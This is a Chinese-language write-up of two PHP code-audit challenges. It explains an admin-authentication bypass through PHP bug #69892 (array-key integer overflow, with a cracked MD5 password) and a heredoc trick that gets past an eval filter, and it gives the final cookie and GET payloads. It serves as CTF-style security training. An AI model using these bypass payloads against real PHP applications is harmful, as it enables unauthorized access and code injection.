小组任务1(phpbug#69892)

参考文献：https://github.com/CHYbeta/Code-Audit-Challenges

1.php的Bug＃69892

$users = array(
        "0:9b5c3d2b64b8f74e56edec71462bd97a" ,
        "1:4eb5fb1501102508a86971773849d266",
        "2:facabd94d57fc9f1e655ef9ce891e86e",
        "3:ce3924f011fe323df3a6a95222b0c909",
        "4:7f6618422e6a7ca2e939bd83abde402c",
        "5:06e2b745f3124f7d670f78eabaa94809", //hund
        "6:8e39a6e40900bb0824a8e150c0d0d59f",
        "7:d035e1a80bbb377ce1edce42728849f2",
        "8:0927d64a71a9d0078c274fc5f4f10821",
        "9:e2e23d64a642ee82c7a270c6c76df142",
        "10:70298593dd7ada576aff61b6750b9118"
);
$valid_user = false;
$input = $_COOKIE['user'];
$input[1] = md5($input[1]);
foreach ($users as $user)
{
        $user = explode(":", $user);
        if ($input === $user) {
                $uid = $input[0] + 0;
                $valid_user = true;
        }
}
if (!$valid_user) {
        die("not a valid user\n");
}
if ($uid == 0) {
        echo "Hello Admin How can I serve you today?\n";
        echo "SECRETS ....\n";
} else {
        echo "Welcome back user\n";
}

题目其实很容易理解，就是输入user[0]和user[1]，其中user[0]==0且user[1]=$users中的任意一个

看见0~10这些内容第一反应就是md5解密，都试过一遍之后发现只有第五个能解出来，user[0]=5;user[1]=hund这个就可以得到你是普通用户的欢迎信息了，但是想要的是管理员的，所以得尝试将$uid=0这个条件实现，这个时候就需用到php的Bug＃69892

[2015-06-20 14:29 UTC] nikic@php.net 描述： ------------
var_dump（[0 => 0] === [0x100000000 => 0]）; //布尔（true） 
所有版本：http://3v4l.org/Sjdf8</pre>

php运行在32位系统的会将数组的键 0x100000000=2^32=4294967296 变换为字符串，而在64位系统会直接 数组中的键4294967296 为unsigned long 类型 且等同于0

• 最后的payload

Cookie: user[4294967296]=5;user[1]=hund;

2.PHP 0819

<?php
// closure, because of namespace!
$challenge = function()
{
        $f = Common::getGetString('eval');
        $f = str_replace(array('`', '$', '*', '#', ':', '\\', '"', "'", '(', ')', '.', '>'), '', $f);
        if((strlen($f) > 13) || (false !== stripos($f, 'return'))){
                die('sorry, not allowed!');
        }
        try{
                eval("\$spaceone = $f");
        }
        catch (Exception $e){
                return false;
        }
        return ($spaceone === '1337');
};
?>

通过get的eval参数传入并赋值到变量f，然后经过str_replace()的过滤，要求长度小于13，并且不包含字符串return，接着执行eval，然后让`spaceone === '1337'返回True。最后一行spaceone === '1337'`，要求类型和值都得相等。看一下str_replace()，过滤了单引号，双引号，所以如果直接get传参`index.php?eval='1337'`进去，在经过过滤后，到最后会变为spaceone=1337，不等。

可以用heredoc构造绕过单引号

<<<EOF
内容
EOF;

内容中不能包括特殊符号，以一个变量起始，以相同的变量名+;结束(还要再加上一个换行符！)

• 最终payload

?eval=<<<s%0a1337%0as;%0a